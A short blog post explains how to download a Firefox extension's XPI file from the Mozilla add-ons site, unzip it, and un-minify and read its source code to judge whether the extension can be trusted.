When using a Firefox extension created by someone, you grant access to various websites you visit and to the content of the websites. How do you know if the extension can be trusted?
I recently wanted to check an addon, and it was possible to do it this way:
First, right click the "Add to Firefox" button and copy the link.
The link I copied is: https://addons.mozilla.org/firefox/downloads/file/3915177/i_dont_care_about_cookies-3.3.7-an+fx.xpi
Open a terminal and use the following command to download the addon:
The downloaded addon is an XPI file (pronounced as "zippy") which can be extracted using your existing unzip program.
Just right-click the file and extract.
Once extracted, you can examine the source code of the addon. Note that some authors may have minified their code, which not only makes it difficult to read, it also slows down the text editor, when you open the file, because all the source code will be in a single line.
So, before opening minified code, first un-minify it using a pretty-printer or an un-minification tool.
That's it. Examine the source code and see for yourself if the extension is trust-worthy.
No comments:
Post a Comment